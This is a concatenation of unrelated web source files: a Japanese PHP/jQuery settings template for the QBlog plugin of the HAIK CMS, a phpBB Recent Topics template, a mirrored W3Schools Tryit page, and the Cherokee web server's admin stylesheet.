.on("click", "a.qblog_get_comment", function(){
var $$ = $(this), $tr = $(this).closest("tr");
var id = $tr.attr("id").split("_").pop();
var pagename = $("input:hidden[name=page]", $tr).val();
var action = "<?php echo h($script) ?>";
var data = {
mode : "get_comment",
refer : pagename,
plugin : "qblog_comment",
id : id
};
$.post(action, data, function(res){
$$.tooltip("hide")
.attr("data-original-title", res)
.tooltip("fixTitle")
.tooltip("show");
});
return false;
});
$("#qblog_social_widget")
.on("click", "input:radio", function(){
var $$ = $(this);
if ($$.val() == "html") {
$("#qblog_social_html").show();
}
else if ($$.val() == "wiki") {
$("#qblog_social_wiki").show();
} else {
$("#qblog_social_html").hide();
}
});
$("#qblog_ping")
.on("click", "input:radio", function(){
var $$ = $(this);
if ($$.val() == "1") {
$("#qblog_ping_str").show();
}
else {
$("#qblog_ping_str").hide();
}
});
//radio:default
$("#qblog_social_widget input:radio[value='<?php echo h($qblog_social_widget)?>']").click();
$("#qblog_ping input:radio[value='<?php echo h($qblog_enable_ping)?>']").click();
$("#qblog_enable_comment input:radio[value='<?php echo h($qblog_enable_comment)?>']").click();
$("#qblog_comment_notice input:radio[value='<?php echo h($qblog_comment_notice)?>']").click();
$("#qblog_close input:radio[value='<?php echo h($qblog_close)?>']").click();
$("div.qblog_info a[data-tab]").click(function(){
var tab = $(this).attr("data-tab");
$("a[href=#"+tab+"]").tab('show');
});
$("#qblog_rss_url").click(function(){
$(this).focus().select();
});
$("#go_qblog_title").click(function(){
$("#qblog_title input:text[name=title]").focus().select();
});
// !カテゴリ名の変更
$('input[name="rename_category"]').on('click', function(){
var catname = $(this).closest('tr').find('td:first-child').text();
$('#qblog_rename_category').find('input:text[name="cat_name"]').val(catname).end()
.find('input:hidden[name="org_cat_name"]').val(catname).end()
.modal();
});
$("#qblog_rename_category").on('keydown', 'input:text[name="cat_name"]', function(e){
//Enterキーで確定
if (e.which == 13 || e.keyCode == 13) {
$('#qblog_rename_category form').submit();
return false;
}
});
if (/^general|category|external|misc$/.test(location.hash))
{
$("a[href="+location.hash+"]").tab('show');
}
else if (/^general|category|external|misc$/.test("<?php echo h($hash)?>"))
{
$("a[href=#<?php echo h($hash)?>]").tab('show');
}
});
</script>
<p>
<a href="<?php echo h($script)?>">HAIKトップ</a> <span class="devider"> > </span>
<a href="<?php echo h($script)?>?cmd=qhmsetting">設定一覧</a> <span class="devider"> > </span>
here
<a href="<?php echo $script?>?QBlog" style="display:block;float:right;"><i class="icon icon-home"></i>ブログトップ</a>
</p>
<h2>ブログ設定</h2>
<div class="notifier"></div>
<?php if (isset($qblog_info) && $qblog_info != '') : ?>
<div class="MT10 MB10">
<?php echo $qblog_info?>
</div>
<?php endif; ?>
<?php if (isset($qblog_error) && $qblog_error != '') : ?>
<div class="qblog_error alert alert-error">
<button class="close" data-dismiss="alert">×</button>
<?php echo $qblog_error ?>
</div>
<?php endif; ?>
<?php if (count($pending_comments) > 0) :?>
<div id="qblog_pending_comments" class="alert alert-warning">
<h5>未承認コメントがあります。</h5>
<table id="qblog_comment_list" class="table" style="color: #666;">
<thead>
<th>記事</th>
<th>コメント</th>
<th>投稿者</th>
<th>投稿日</th>
<th></th>
</thead>
<tbody>
<?php foreach ($pending_comments as $comment) :
$comment_url = $script . '?'. rawurlencode($comment['page']).'#qbcomment_'.h($comment['id']);
$comment_date = date($qblog_date_format, $comment['time']);
?>
<tr class="qblog-comment-item" id="qbcomment_<?php echo h($comment['id']) ?>">
<td>
<a href="<?php echo $comment_url ?>" class="qblog_post_title"><?php echo h($comment['post_title'])?></a>
</td>
<td>
<a href="#" class="qblog_get_comment" rel="tooltip" data-original-title="" data-placement="top"><?php echo h($comment['title']) ?></a>
</td>
<td><?php echo h($comment['name'])?></td>
<td><?php echo h($comment_date)?></td>
<td style="text-align:right;">
<input type="button" name="accept" value="承認" class="btn btn-success" />
<input type="button" value="削除" name="hide" class="btn btn-danger" />
<input type="hidden" name="page" value="<?php echo h($comment['page'])?>" />
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<?php endif; ?>
<div class="qblog-set">
<?php if ( ! is_page($qblog_defaultpage)) : ?>
<!-- QBlog ページがなければ、「開始」ボタンを表示 -->
<div class="well well-small">
<h2>ブログをはじめよう!</h2>
<p>HAIKでブログを書くことができます。</p>
<div class="form-actions">
<form action="<?php echo h($script) ?>" method="post">
<input type="hidden" name="cmd" value="qblog" />
<input type="hidden" name="mode" value="start" />
<input type="submit" class="btn btn-primary" value="ブログの開始" />
</form>
</div>
</div>
<?php return;?>
<?php endif; ?>
<div class="tabbable">
<ul class="nav nav-tabs">
<li class="active"><a href="#general" data-toggle="tab">全般</a></li>
<li><a href="#category" data-toggle="tab">カテゴリ</a></li>
<li><a href="#external" data-toggle="tab">外部連携</a></li>
<li><a href="#misc" data-toggle="tab">その他</a></li>
</ul>
<div class="tab-content">
<div id="general" class="tab-pane active">
<br />
<div id="qblog_title" class="well well-small">
<h2>ブログタイトル</h2>
<p>ブログの名前を設定できます。</p>
<div>
<form action="<?php echo h($script)?>" method="post">
<input type="hidden" name="cmd" value="qblog" />
<input type="hidden" name="mode" value="edit_title" />
<input type="text" name="title" value="<?php echo h($qblog_title)?>" />
<input type="submit" value="保存" class="btn btn-primary" />
</form>
</div>
<ul class="nav nav-pills" style="margin-left: 0;">
<li><a href="<?php echo h($script.'?'.$qblog_defaultpage)?>">>> 表示を確認する</a></li>
</ul>
</div>
<div id="qblog_enable_comment" class="well well-small">
<h2>コメントの表示・非表示</h2>
<form action="<?php echo h($script)?>" method="post">
<table class="table table_condensed">
<thead>
<tr>
<td>ブログ記事のコメント欄の表示、非表示を設定します。</td>
</tr>
</thead>
<tbody>
<tr>
<td><label class="radio"><input type="radio" name="qblog_enable_comment" id="" value="1" />
<b>表示する</b>
</label></td>
</tr>
<tr>
<td><label class="radio"><input type="radio" name="qblog_enable_comment" id="" value="0" />
<b>表示しない</b>
</label>
</td>
</tr>
</tbody>
</table>
<div class="form-actions">
<input type="submit" value="保存" class="btn btn-primary" />
<span class="message" style="margin-left:15px;color:#666;"></span>
</div>
<input type="hidden" name="cmd" value="qblog" />
<input type="hidden" name="mode" value="enable_comment" />
</form>
</div>
<div id="qblog_comment_notice" class="well well-small">
<h2>コメントの通知</h2>
<?php if ( ! isset($admin_email) OR trim($admin_email) === ''):?>
<div class="alert">
管理者メールアドレスが設定されていません。<br />
設定は<a href="<?php echo h($script)?>?cmd=qhmsetting&mode=form&phase=admin">こちら</a>。
</div>
<?php else:?>
<form action="<?php echo h($script)?>" method="post">
<table class="table table_condensed">
<thead>
<tr>
<td>ブログ記事にコメントがあった場合、メールで通知します。</td>
</tr>
</thead>
<tbody>
<tr>
<td><label class="radio"><input type="radio" name="qblog_comment_notice" id="" value="1" />
<b>通知する</b>
</label></td>
</tr>
<tr>
<td><label class="radio"><input type="radio" name="qblog_comment_notice" id="" value="0" />
<b>通知しない</b>
</label>
</td>
</tr>
</tbody>
</table>
<div class="form-actions">
<input type="submit" value="保存" class="btn btn-primary" />
<span class="message" style="margin-left:15px;color:#666;"></span>
</div>
<input type="hidden" name="cmd" value="qblog" />
<input type="hidden" name="mode" value="comment_notice" />
</form>
<?php endif;?>
</div>
<div id="qblog_social_widget" class="well well-small">
<h2>ソーシャルプラグイン表示設定</h2>
<form action="<?php echo h($script)?>" method="post">
<table class="table table_condensed">
<thead>
<tr>
<td>ブログ記事のコメント欄の上にソーシャルプラグインを表示できます。<br />
Wiki書式の記述や外部サービスのHTMLコードも挿入可能です。
</td>
</tr>
</thead>
<tbody>
<tr>
<td><label class="radio"><input type="radio" name="qblog_social_widget" id="" value="default" />
<b>標準</b>:Twitter, Facebook のボタンを表示する。
</label></td>
</tr>
<tr>
<td><label class="radio"><input type="radio" name="qblog_social_widget" id="" value="wiki" />
<b>カスタム</b>:任意のWiki書式を使う
</label>
<textarea name="qblog_social_wiki" id="qblog_social_wiki" cols="60" rows="4" class="input-xxlarge" style="display:none;"><?php echo h($qblog_social_wiki)?></textarea>
</td>
</tr>
<tr>
<td><label class="radio"><input type="radio" name="qblog_social_widget" id="" value="html" />
<b>カスタム</b>:任意のHTMLを使う
</label>
<textarea name="qblog_social_html" id="qblog_social_html" cols="60" rows="4" class="input-xxlarge" style="display:none;"><?php echo h($qblog_social_html)?></textarea>
</td>
</tr>
<tr>
<td>
<label class="radio"><input type="radio" name="qblog_social_widget" id="" value="none" />
<b>なし</b>
</label></td>
</tr>
</tbody>
</table>
<div class="form-actions">
<input type="submit" value="保存" class="btn btn-primary" />
<span class="message" style="margin-left:15px;color:#666;"></span>
</div>
<input type="hidden" name="cmd" value="qblog" />
<input type="hidden" name="mode" value="social_widget" />
</form>
</div>
</div>
<div id="category" class="tab-pane">
<br />
<div class="well well-small">
<h2>カテゴリ管理</h2>
<table class="table table-striped">
<thead>
<th>カテゴリ名</th>
<th>登録数</th>
<th></th>
</thead>
<tbody>
<?php foreach ($categories as $category => $row) :?>
<?php
if ($category === $qblog_default_cat) :
continue;
endif;
?>
<tr>
<td class="qblog-category-item"><?php echo h($category)?></td>
<td style="text-align:right"><?php echo number_format($row['num'])?></td>
<td style="text-align:right">
<input type="button" name="rename_category" value="名前変更" class="btn btn-primary" />
<form action="<?php echo h($script) ?>" method="post" style="display:inline;">
<input type="hidden" name="cmd" value="qblog" />
<input type="hidden" name="mode" value="delete" />
<input type="hidden" name="category" value="<?php echo h($category)?>" />
<input type="submit" name="remake" value="削除" onclick="return confirm('削除しますか?');" class="btn btn-danger" />
</form>
</td>
</tr>
<?php endforeach; ?>
<tr>
<td class="qblog-category-item"><?php echo h($qblog_default_cat)?></td>
<td style="text-align:right"><?php echo number_format($categories[$qblog_default_cat]['num'])?></td>
<td style="text-align:right">
<input type="button" name="rename_category" value="名前変更" class="btn btn-primary" />
<span class="dummyspan" style="width:58px;display:inline-block;"></span>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div id="external" class="tab-pane">
<br />
<div id="qblog_ping" class="well well-small">
<h2>Ping送信</h2>
<form action="<?php echo h($script)?>" method="post">
<table class="table table_condensed">
<thead>
<tr>
<td>
<p>
ブログの更新情報をブログポータルサービスなどへ送信します。<br />
任意の送信先を指定可能です。
</p>
<div class="alert alert-info">
<i class="icon icon-info-sign"></i>
<b>送信する</b>を選んで保存すると、直ちにPing送信を行います。<br />
<i class="icon icon-info-sign"></i>
Ping 送信には時間がかかりますので、送信先は20個くらいまでを推奨します。
</div>
</td>
</tr>
</thead>
<tbody>
<tr>
<td><label class="radio"><input type="radio" name="qblog_enable_ping" id="" value="1" />
<b>送信する</b>:Ping 送信先は1行ずつ指定してください。
</label>
<textarea name="ping" id="qblog_ping_str" cols="60" rows="10" class="input-xxlarge" style="display:none;"><?php echo h($qblog_ping)?></textarea>
</td>
</tr>
<tr>
<td>
<label class="radio"><input type="radio" name="qblog_enable_ping" id="" value="0" />
<b>送信しない</b>
</label></td>
</tr>
</tbody>
</table>
<div class="form-actions">
<input type="submit" value="保存" class="btn btn-primary" />
<span class="message" style="margin-left:15px;color:#666;"></span>
</div>
<input type="hidden" name="cmd" value="qblog" />
<input type="hidden" name="mode" value="update_ping" />
</form>
</div>
<?php if ($rss_url != ''):?>
<div class="well well-small">
<h2>RSS配信URL</h2>
<p>コピーしてご利用ください。</p>
<input type="text" value="<?php echo h($rss_url)?>" id="qblog_rss_url" size="80" class="span6" readonly="readonly" />
</div>
<?php endif;?>
</div>
<div id="misc" class="tab-pane">
<br />
<div class="well well-small">
<h2>ブログの修復</h2>
<p>一覧表示に不具合がある場合、修復を行って下さい。</p>
<div class="form-actions">
<form action="<?php echo h($script) ?>" method="post" style="display:inline;">
<input type="hidden" name="cmd" value="qblog" />
<input type="hidden" name="mode" value="rebuild" />
<input type="submit" name="rebuild" value="修復" onclick="return confirm('修復しますか?');" class="btn btn-primary" />
</form>
</div>
</div>
<div id="qblog_close" class="well well-small">
<h2>ブログの閉鎖</h2>
<form action="<?php echo h($script)?>" method="post">
<table class="table table_condensed">
<thead>
<tr>
<td>ブログを閉鎖し、全てのアクセスをトップページへ転送します。</td>
</tr>
</thead>
<tbody>
<tr>
<td><label class="radio"><input type="radio" name="qblog_close" id="" value="0" />
<b>公開する</b>
</label>
</td>
</tr>
<tr>
<td><label class="radio"><input type="radio" name="qblog_close" id="" value="1" />
<b>閉鎖する</b>
</label></td>
</tr>
</tbody>
</table>
<div class="form-actions">
<input type="submit" value="保存" class="btn btn-primary" />
<span class="message" style="margin-left:15px;color:#666;"></span>
</div>
<input type="hidden" name="cmd" value="qblog" />
<input type="hidden" name="mode" value="close" />
</form>
</div>
<div id="qblog_move_eblog" class="well well-small">
<h2>簡易ブログからの引越し</h2>
<p>簡易ブログからQBlogへ引越します</p>
<form action="<?php echo h($script) ?>" method="post">
<div><label>簡易ブログページ:<input type="text" name="eblog_page" value="" /></label></div>
<div class="form-actions">
<input type="submit" value="次へ" class="btn btn-primary" />
</div>
<input type="hidden" name="mode" value="move_from_eblog_confirm" />
<input type="hidden" name="cmd" value="qblog" />
</form>
</div>
<?php if ($move_amebro) : ?>
<div id="qblog_move_ameba" class="well well-small">
<h2>アメブロからの引越し</h2>
<p>アメブロからブログを引越します</p>
<p style="font-size:90%;color:#666;">※ アメンバー限定記事は引っ越せません</p>
<form action="<?php echo h($script) ?>" method="post">
<div>
<label>アメブロのID:
<input type="text" name="ameba_id" value="" />
</label>
</div>
<div>
<label>アメブロのパスワード:
<input type="password" name="ameba_password" value="" />
</label>
</div>
<div class="form-actions">
<input type="submit" value="次へ" class="btn btn-primary" />
</div>
<input type="hidden" name="mode" value="move_confirm" />
<input type="hidden" name="cmd" value="qblog" />
</form>
</div>
<?php endif; ?>
</div>
</div>
</div>
</div>
<div id="qblog_rename_category" class="modal fade">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button class="close" data-dismiss="modal">×</button>
<h4 class="modal-title">カテゴリ名の変更</h4>
</div>
<form action="<?php echo h($script) ?>" method="post" style="display:inline;">
<div class="modal-body">
<input type="text" name="cat_name" value="" class="form-control" />
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal">キャンセル</button>
<input type="submit" name="rename" class="btn btn-primary" value="変更" />
<input type="hidden" name="org_cat_name" value="" />
<input type="hidden" name="cmd" value="qblog" />
<input type="hidden" name="mode" value="rename_category" />
</div>
</form>
</div>
</div>
</div>
|
styles/all/template/event/index_body_markforums_after.html | Sajaki/RecentTopics | {% if RECENT_TOPICS_DISPLAY and recent_topics_included neq true %}
<!-- DEFINE recent_topics_included = true -->
{% if S_LOCATION_TOP %}
<div id="recenttopicstop">
{% INCLUDE '@paybas_recenttopics/recent_topics_body_topbottom.html' %}
</div>
{% elseif S_LOCATION_SIDE %}
<div id="phpbbsection">
<div class="index-right">
{% INCLUDE '@paybas_recenttopics/recent_topics_body_side.html' %}
{% EVENT recenttopics_mchat_side %}
{% if ADS_INDEX_CODE and not S_IS_BOT and definition.ADSIDE eq false %}
{% DEFINE ADSIDE = 1 %}
<div class="misc-block advertisement">{{ ADS_INDEX_CODE }}</div>
{{ definition.ADS }}
{% endif %}
</div>
<div class="index-left">
{% endif %}
{% endif %} |
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/php/showphp3b1b.html | platinhom/ManualHom |
<!DOCTYPE html>
<html>
<!-- Mirrored from www.w3schools.com/php/showphp.asp?filename=demo_oper_arr_identity by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 07:25:19 GMT -->
<head>
<title>Tryit Editor v2.1 - Show PHP</title>
<link rel="stylesheet" href="../trycss.css">
<!--[if lt IE 8]>
<style>
.textarea, .iframe {height:800px;}
#iframeSource, #iframeResult {height:700px;}
</style>
<![endif]-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','../../www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-3855518-1', 'auto');
ga('require', 'displayfeatures');
ga('send', 'pageview');
</script>
<script type='text/javascript'>
var googletag = googletag || {};
googletag.cmd = googletag.cmd || [];
(function() {
var gads = document.createElement('script');
gads.async = true;
gads.type = 'text/javascript';
var useSSL = 'https:' == document.location.protocol;
gads.src = (useSSL ? 'https:' : 'http:') +
'//www.googletagservices.com/tag/js/gpt.js';
var node = document.getElementsByTagName('script')[0];
node.parentNode.insertBefore(gads, node);
})();
</script>
<script type='text/javascript'>
googletag.cmd.push(function() {
googletag.defineSlot('/16833175/TryitLeaderboard', [[728, 90], [970, 90]], 'div-gpt-ad-1383036313516-0').addService(googletag.pubads());
googletag.pubads().setTargeting("content","tryphp");
googletag.pubads().enableSingleRequest();
googletag.enableServices();
});
</script>
</head>
<body>
<div style="position:relative;width:100%;margin-top:0px;margin-bottom:0px;">
<div style="width:974px;height:94px;position:relative;margin:0px;margin-left:auto;margin-right:auto;margin-top:5px;margin-bottom:5px;padding:0px;overflow:hidden;">
<!-- TryitLeaderboard -->
<div id='div-gpt-ad-1383036313516-0' style='width:970px; height:90px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1383036313516-0'); });
</script>
</div>
<div style="clear:both"></div>
</div>
</div>
<div class="container">
<div class="textareacontainer">
<div class="textarea">
<div class="headerText">PHP Source:</div>
<div class="iframewrapper">
<iframe id="iframeSource" frameborder="0" src="showphpcodebb15.html?source=demo_oper_arr_identity"></iframe>
</div>
</div>
</div>
<div class="iframecontainer">
<div class="iframe">
<div class="headerText">Result:</div>
<div class="iframewrapper">
<iframe id="iframeResult" frameborder="0" src="demo_oper_arr_identity.html"></iframe>
</div>
<div class="footerText">Show PHP - © <a href="../index.html">w3schools.com</a></div>
</div>
</div>
</div>
</body>
<!-- Mirrored from www.w3schools.com/php/showphp.asp?filename=demo_oper_arr_identity by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 07:25:19 GMT -->
</html> |
admin/static/css/cherokee-admin.css | chetan/cherokee | /* Cherokee Admin
*
* Authors:
* Alvaro Lopez Ortega <alvaro@alobbs.com>
*
* Copyright (C) 2001-2010 Alvaro Lopez Ortega
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of version 2 of the GNU General Public
* License as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
* 02110-1301, USA.
*/
/* General styles
*/
html { height: 100%; }
body { background: #def url(/static/images/bg-body.png) top center repeat-y; font-family: Helvetica, Arial, Tahoma, sans-serif; font-size: 12px; color: #000; text-align: center; }
a { color: #27c; }
a:hover { color: #c00; text-decoration: underline; cursor: pointer; outline: none; }
a:active { outline: none; }
a:focus { -moz-outline-style: none; outline: none; }
h1 { color: #c00; font-weight: normal; padding: 16px 0 16px 16px; font-size: 20px; z-index: 9000; }
h2 { color: #259; font-weight: normal; padding: 8px 0; font-size: 18px; z-index: 9000; border-bottom: 1px solid #def; }
/* Styles for cherokee-admin layout
*/
html>body #container { min-height: 100%; }
#container { width: 960px; margin: 0 auto; text-align: left; height: 100%; }
#main { background: #fff; padding: 0; margin: 0; width: 958px; margin: 0 auto;}
#topbar-container { background: #def url(/static/images/bg-bar.png) top left repeat-x; }
#topbar { height: 52px; background: #fff url(/static/images/bg-bar.png) top left repeat-x; width: 960px; margin: 0 auto; text-align: left; }
#topbar img { float: left; }
#nav { float: right; padding:0; font-size: 11px; }
#nav li {float: left; margin: 0;padding: 0;text-align: center; width: 64px; height: 50px; }
#nav li:hover { background-color: #259; }
#nav li a { display: block; height: 20px; text-decoration: none;color: #eef;border: none; padding-top: 34px; text-shadow: #14335d 0px 1px 0px; }
#nav li a:hover { color: #fff; text-decoration: none;}
#nav-index { background: transparent url(/static/images/home.png) no-repeat center 6px; }
#body-index #nav-index a { background: transparent url(/static/images/nav-selected.gif) no-repeat center 47px; }
#nav-market { background: transparent url(/static/images/market.png) no-repeat center 6px; }
#body-market #nav-market a { background: transparent url(/static/images/nav-selected.gif) no-repeat center 47px; }
#body-market-app #nav-market a { background: transparent url(/static/images/nav-selected.gif) no-repeat center 47px; }
#nav-status { background: transparent url(/static/images/status.png) no-repeat center 6px; }
#body-status #nav-status a { background: transparent url(/static/images/nav-selected.gif) no-repeat center 47px; }
#nav-general { background: transparent url(/static/images/general.png) no-repeat center 6px; }
#body-general #nav-general a { background: transparent url(/static/images/nav-selected.gif) no-repeat center 47px; }
#nav-icons { background: transparent url(/static/images/icons.png) no-repeat center 6px; }
#body-icons #nav-icons a { background: transparent url(/static/images/nav-selected.gif) no-repeat center 47px; }
#nav-mime { background: transparent url(/static/images/mime.png) no-repeat center 6px; }
#body-mime #nav-mime a { background: transparent url(/static/images/nav-selected.gif) no-repeat center 47px; }
#nav-vservers { background: transparent url(/static/images/vservers.png) no-repeat center 6px; }
#body-vservers #nav-vservers a, #body-rules #nav-vservers a { background: transparent url(/static/images/nav-selected.gif) no-repeat center 47px; }
#nav-source { background: transparent url(/static/images/sources.png) no-repeat center 6px; }
#body-source #nav-source a { background: transparent url(/static/images/nav-selected.gif) no-repeat center 47px; }
#nav-advanced { background: transparent url(/static/images/advanced.png) no-repeat center 6px; }
#body-advanced #nav-advanced a { background: transparent url(/static/images/nav-selected.gif) no-repeat center 47px; }
#body-source, #body-vservers, #body-rules, #body-general, #body-status { overflow: hidden; }
/** Save **/
#save-box { background: transparent url(/static/images/nav-sep.png) no-repeat; float: right; height: 38px; padding: 12px 16px 0 16px; margin-left: 8px; }
/* Help menu
*/
#help {
position: absolute;
width: 64px;
top: 60px;
margin-left: 900px;
}
#body-index #help { display: none; }
a.helpbutton {
border: 0;
margin: 0;
padding: 0;
outline: none;
background: transparent url('/static/images/bg-help-a.png') no-repeat scroll top right;
color: #79b;
text-shadow: #fff 0px 1px 0px;
display: block;
float: right;
height: 20px;
margin-right: 0;
padding-right: 14px;
text-decoration: none;
}
a.helpbutton span {
outline: none;
padding: 0;
margin: 0;
border: 0;
font-size: 11px;
background: transparent url('/static/images/bg-help-span.png') no-repeat;
display: block;
line-height: 14px;
padding: 4px 0 4px 14px;
}
.help {
position: absolute;
right: 4px;
border: 1px solid #cde;
border-top: none;
background: #f4f9ff;
width: 214px;
float: right;
margin-top: 20px;
display: none;
padding: 8px;
z-index: 9999;
}
.help_entry {
margin: 6px 0;
}
/* Panels
*/
#status_panel, #vservers_panel, #rules_panel, #source_panel {
background: #fff;
height: 320px;
margin: 0 2px 8px 2px;
border: 1px solid #cde;
overflow: auto;
overflow-x: hidden;
}
.status_content, .vserver_content, .source_content, .rules_content {
width: 716px;
padding: 0;
float: right;
background-color: #fff;
}
.status_content h2, .vserver_content h2, .source_content h2, .rules_content h2 {
border: none;
padding-left: 16px;
color: #27c;
font-size: 16px;
}
.status_content .ui-tabs .ui-tabs-panel,
.vserver_content .ui-tabs .ui-tabs-panel,
#source-workarea,
.rules_content .ui-tabs .ui-tabs-panel {
padding-left: 16px;
background-color: #fff;
border: 0;
overflow: auto;
}
#source-workarea {
border-top: 1px solid #cde;
}
#source-workarea .button {
float: right;
margin: 0 16px 32px 16px;
}
#source-usage,
#env_table {
table-layout: fixed;
border-collapse: collapse;
width: 670px;
border: 1px solid #cde;
margin-bottom: 32px;
}
#env_table {
width: 648px;
margin-bottom: 0;
}
#source-usage th,
#env_table th {
background: #e6f3ff url(/static/images/bg-th.png) repeat-x;
border: none;
border-bottom: 2px solid #27c;
padding: 8px 4px;
}
#source-usage td,
#env_table td {
border-bottom: 1px solid #cde;
padding: 4px;
}
#env_table td, #env_table th { width: 140px; }
#env_table td + td, #env_table th + th { width: 468px; }
#env_table td + td + td, #env_table th + th + th { width: 32px; }
#env_table td .value { width: 444px; }
.vserver_new_content {
float: right;
}
/* Information sources and VServers*/
.vserver-inactive { color: #999; }
.rule-inactive { color: #999; }
.nick, .name { font-weight: bold; white-space: nowrap; width: 176px; overflow-x: hidden; }
#status_panel .nick { width: 100%; }
.panel #source_panel td .nick { width: 190px; }
.hasScroll td .nick, .hasScroll td .name { width: 166px; }
.panel #source_panel .hasScroll td .nick { width: 180px; }
.type { font-weight: bold; font-size: 11px; color: #666; }
.host { clear: both; color: #999; font-size: 11px; white-space: nowrap; width: 200px;}
.inter { color: #999; font-size: 11px; white-space: nowrap; width: 200px; }
.droot { clear: both; color: #999; font-size: 11px; white-space: nowrap; width: 200px; }
.panel .comment { color: #999; font-size: 11px; white-space: nowrap; width: 200px; }
.panel-selected .droot, .panel-selected .host, .panel-selected .inter, .panel-selected .comment, .panel-selected .type { color: #cde; }
/* Rules table */
#rules-table {
table-layout: fixed;
border-collapse: collapse;
width: 100%;
border: 1px solid #cde;
}
#rules-table th {
background: #e6f3ff url(/static/images/bg-th.png) repeat-x;
border: none;
border-bottom: 2px solid #27c;
padding: 8px 4px;
}
#rules-table th + th { width: 92px; }
#rules-table th + th + th { width: 38px; text-align: center; overflow: hidden; font-size: 10px; }
#rules-table td {
padding: 6px 4px;
background: #eff7ff url(/static/images/bg-td-even.png) repeat-x;
border-top: 1px solid #fff;
border-bottom: 1px solid #def;
border-left: 1px solid #def;
text-align: center;
}
#rules-table td { text-align: left; overflow: hidden; white-space: pre; }
#rules-table td + td { text-align: left; width: 92px; font-size: 11px; }
#rules-table td + td + td { width: 38px; text-align: center; overflow: hidden; }
#rules-table tr.trodd td {
background: #fff;
}
/* Final On/Off */
.panel td .final {
font-size: 9px;
float: right;
height: 14px;
padding: 4px 0;
text-transform:uppercase;
}
.final-on, .final-off {
padding: 1px 3px;
}
.final-on {
border: 1px solid #b90;
color: #b90;
background-color: #fff2b3;
}
.final-off {
border: 1px solid #27c;
color: #27c;
background-color: #def;
}
/* Warning advanced */
#body-advanced .dialog-warning { width: 240px; margin-left: 640px; margin-top: 48px; position: absolute; }
/* Rules
*/
.rule {
border: 1px solid #cde;
padding: 5px;
margin: 5px;
-moz-border-radius: 4px; -webkit-border-radius: 4px;
}
.inactive-rule {
opacity: 0.3;
}
.rulebuttons { height: 52px; }
.rulebuttons .submitter {
width: 64px;
height: 48px;
margin: 0;
float: right;
}
.rule-label-and {
font-weight: bold;
color: #0b0;
}
.rule-label-or {
font-weight: bold;
color: #27c;
}
.rule-label-not {
font-weight: bold;
color: #c00;
}
/* Flag list
*/
.check-list-flags {
width: 400px;
height: 300px;
overflow-y: scroll;
text-align: left;
}
.check-list-flags-entry img {
margin-right: 5px;
margin-left: 5px;
}
.check-list-flags-entry input {
margin-left: 10px;
}
/* Icon Chooser
*/
img.icon_chooser_entry {
padding: 5px;
margin: 5px;
border: 1px solid #ccc;
}
img.icon_chooser_used {
background-color: #dedede;
opacity: 0.3;
border: 1px solid #666;
}
img.icon_chooser_unused:hover {
border: 1px solid #666;
background-color: #efefef;
}
img.icon_chooser_selected {
border: 1px solid #666;
background-color: #81bef7;
}
/* Top dialog
*/
#save-button {
text-transform: uppercase;
color: #fff;
text-shadow: #14335d 0px 1px 0px;
border: 1px solid #17457e;
background: #235699;
background: -webkit-gradient(linear, left top, left bottom, from(#5e8bc9), to(#235699));
background: -moz-linear-gradient(top, #396aae, #235699);
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#396aae', endColorstr='#235699');
-moz-box-shadow: inset 1px 1px 0 #7798c2;
-webkit-box-shadow: inset 1px 1px 0 #7798c2;
box-shadow: inset 1px 1px 0 #7798c2;
}
#save-button.saved {
color: #17457e;
text-shadow: #24589b 0px 1px 0px;
background: #24589b;
background: -webkit-gradient(linear, left top, left bottom, from(#24589b), to(#24589b));
background: -moz-linear-gradient(top, #24589b, #24589b);
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#24589b', endColorstr='#24589b');
-moz-box-shadow: inset 1px 1px 0 #24589b;
-webkit-box-shadow: inset 1px 1px 0 #24589b;
box-shadow: inset 1px 1px 0 #24589b;
}
#save-button:active {
-moz-box-shadow: inset 0 1px 4px #24589b;
-webkit-box-shadow: inset 0 1px 4px #24589b;
box-shadow: inset 0 1px 4px #24589b;
}
/* PageHelp
*/
.help_toc { float: left; width: 220px; }
.help_content { overflow: scroll; }
.help_selected { background: #eef3ff; font-weight: bold; }
/* Wizard
*/
.wizard-list li {
cursor: pointer;
}
.wizard-list-selected {
background: #fff6b6;
}
.druid-button-panel button {
margin: 16px 4px;
}
/* Index
*/
#top-box { padding: 16px 0 8px 0; border-bottom: 1px solid #def; margin: 0; height: 28px; }
#top-box h1 { padding: 0; margin: 0 0 0 16px; float: left; width: 400px; }
#home-container { overflow: auto; overflow-x: hidden; background: transparent url(/static/images/sidebar-bg.png) right top repeat-y; }
#main-area { width: 648px; padding: 16px; float: left; }
.main-banner { height: 168px; background: transparent url(/CTK/images/loader.gif) no-repeat center center; padding-bottom: 16px; }
#sidebar { width: 248px; float: left; margin-left: 4px; margin-right: 8px; }
#sidebar h2 { border: none; font-size: 120%; padding: 0; margin: 0 0 8px 0; text-shadow: #fff 0px 1px 0px;}
.sidebar-box { margin: 16px 0; padding-bottom: 16px; border-bottom: 1px solid #def; }
#topitems-box { float: right; width: 500px; margin-right: 16px; }
#language-selector { float: right; margin: 0; padding: 0; height: 28px; }
#language-list { display: inline; margin: 0; padding: 0;}
.login-box { float: right; padding-left: 16px; height: 28px; }
.login-box-form { padding-top: 1px; }
.login-box-logged-in { padding-top: 6px; }
